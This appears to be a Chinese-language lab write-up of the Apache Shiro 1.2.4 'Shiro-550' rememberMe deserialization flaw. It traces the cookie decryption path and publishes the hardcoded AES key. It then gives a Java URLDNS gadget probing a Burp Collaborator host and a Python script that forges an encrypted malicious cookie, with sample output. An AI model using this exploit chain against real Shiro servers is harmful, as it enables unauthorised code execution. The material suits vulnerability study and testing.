Shiro
环境搭建
所需环境
1
2
3jdk8u65
Tomcat8
shiro 1.2.4shiro环境直接clone p神的github地址
启动tomcat,即可看到
Shiro550分析
漏洞原理
勾选 RememberMe 字段,登陆成功的话,返回包 set-Cookie 会有 rememberMe=deleteMe 字
段,还会有 rememberMe 字段,之后的所有请求中 Cookie 都会有 rememberMe 字段,那么就
可以利用这个 rememberMe 进行反序列化,从而 getshell。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26////Request
POST /shirodemo_war/login.jsp HTTP/1.1
Host: 192.168.124.15:8081
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.124.15:8081
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.124.15:8081/shirodemo_war/login.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
username=root&password=secret&rememberMe=on&submit=Login
////Response
HTTP/1.1 302
Set-Cookie: JSESSIONID=1467280596697A870D71F2A15C2E5B84; Path=/shirodemo_war; HttpOnly
Set-Cookie: rememberMe=deleteMe; Path=/shirodemo_war; Max-Age=0; Expires=Mon, 29-Aug-2022 06:06:08 GMT
Set-Cookie: rememberMe=TJ1wpcFQ6EgXmXmmHQ06fysKrMk3tVUeNsh42bYAnXePmFLX+a9DUp7SyfQcdXvFBHHEY0lPYFGP4TtwJA8MgiQVNrol9LIHlwzUlSkz2ZkCUkUYgW0aGK1Ben6bfU1wLp56z/ygIC0x1qXDDYzzRhdMHptkdPOCTJ1DVgtDP51AeESfhuKP/EVJI5JS+e/QTXReg8GtYowZ48PvWTf65YGwp+j+/LNCbn1Wsk1V5xYf9P7q2Xmm6Zh4C5nV2siStTq32oVYtmkowJSV9LCCTsjAZ0Nw+p5tGxsIbmJU3viTOh1PnMKT2XDEiYor7Jr/SKnjsWkYBWSkSvLs+sPRGwVXUVI1LZ3er9UIzsgWse/lOjXdJ8uV71CATvqaG+71HDy9S8byDEdIW1kMh7zigLTEKAp2edgJi3X19vIcoQBkB3ZSJSEcAwG3tCTfyeSnMFJjNa3NmJ+jMyYQO3Q/oZkSbn7fGRG5aIX0OILCDI7Mk9k9YnkIfijo60KrJEcc; Path=/shirodemo_war; Max-Age=31536000; Expires=Wed, 30-Aug-2023 06:06:08 GMT; HttpOnly
Location: /shirodemo_war/;jsessionid=1467280596697A870D71F2A15C2E5B84
Content-Length: 0
Date: Tue, 30 Aug 2022 06:06:08 GMT
Connection: close根本原因是AES 加密的密钥默认硬编码在代码里(Shiro-550)
cookie解密分析
idea全局查找cookie关键字,发现一下与shiro框架相关的class
1
2
3public interface Cookie
public class SimpleCookie implements Cookie
public class CookieRememberMeManager extends AbstractRememberMeManager跟进CookieRememberMeManager查看相关函数
这个方法中先判断cookie base64后是否为deleteme,是的话则返回,否则base解密后返回,看看谁调用了这个方法
跟进convertBytesToPrincipals看看
、此函数对base64解密后的byte流进行decrypt,然后反序列化。跟进看看
获取cipherService后对bytes解密
其中getDecryptionCipherKey()为获取加解秘钥
跟进cipherService发现使用的是Aes加密,秘钥为base64加密的kPH+bIxk5D2deZiIxcaaaA==
总结上述流程,发现shiro对cookie解密流程为
base64() -> Aes() 之后得到序列化内容
跟进反序列化函数查看
cookie加密分析
在onSuccessfulLogin下断点
可以看到token为明文
跟进
可见和解密过程对称,以上就是cookie加解密全过程
shiro550利用
DNS探测
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29URLDNS链
public class urldns {
public static void main(String[] args) throws IOException, NoSuchMethodException, InstantiationException, IllegalAccessException, NoSuchFieldException, ClassNotFoundException {
HashMap<URL,Object> hashMap = new HashMap<>();
URL url = new URL("https://fudjktkkeq3jv7koksa072r6exkn8c.burpcollaborator.net");
Class urlClass = URL.class;
Field fieldHashCode = urlClass.getDeclaredField("hashCode");
fieldHashCode.setAccessible(true);
fieldHashCode.set(url,123456);
hashMap.put(url,123);
fieldHashCode.set(url,-1);
serialize(hashMap);
//unSerialize("ser.bin");
}
public static void serialize(Object obj) throws IOException {
ObjectOutputStream ooStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
ooStream.writeObject(obj);
}
public static Object unSerialize(String fileName) throws IOException, ClassNotFoundException {
ObjectInputStream oiStrean = new ObjectInputStream(new FileInputStream(fileName));
Object obj = oiStrean.readObject();
return obj;
}
}python加密脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25from Crypto.Cipher import AES
import uuid
import base64
def convert_bin(file):
with open(file,'rb') as f:
return f.read()
def AES_enc(data):
BS=AES.block_size
pad=lambda s:s+((BS-len(s)%BS)*chr(BS-len(s)%BS)).encode()
key="kPH+bIxk5D2deZiIxcaaaA=="
mode=AES.MODE_CBC
iv=uuid.uuid4().bytes
encryptor=AES.new(base64.b64decode(key),mode,iv)
ciphertext=base64.b64encode(iv+encryptor.encrypt(pad(data)))
return ciphertext
if __name__=="__main__":
data=convert_bin("ser.bin")
print(AES_enc(data))
结果:
LPWtx1kiT9aPgmH56vw8ertCoG8oAFBmIu3ZtNyaoQtCK9vOekQ4Tx4dKtoxKOsRizCxYoIlWHkHJqvzIZQ5YpgqYEoUVEVqExcCH5xVfbgQD12/ge8euUyZiwIXNouGyO4GbSYEdenS437PYmBvIhQqh3nUrY1KKoVRPOb+F0FxWe9cYXHO/QXvPoLAwIyO/YQte8bW02bYOA26SSKbMLQ4glOTf52JbwLkVB6Shfc4ylY8kDEx34F/E2pwDMk1JNbQfDoUVUAYTN4JEcr4MidEZm5m/1pPnXvvF00A+m+h5ajsDrRRBnOGiqZb6FdHmyh1tA/KUcFMtS29hiEMwDqne0J/9keqnz+9216OF35lWkGcwrOxo7Kab1XCJwM2OR8clh8EtGjO4SQPixNemLcaAPMD23yj5u7d/6EpqmyQ01/93kzt6ATeIjahg9ftNrly9P5oFpF383710PONt5bA80uFU9NY9PRAGstfoITH1hvXynn76HdD3qCZxrqGyP11eQlU1sKByp1ncS9Pqg==抓包该cookie,利用成功
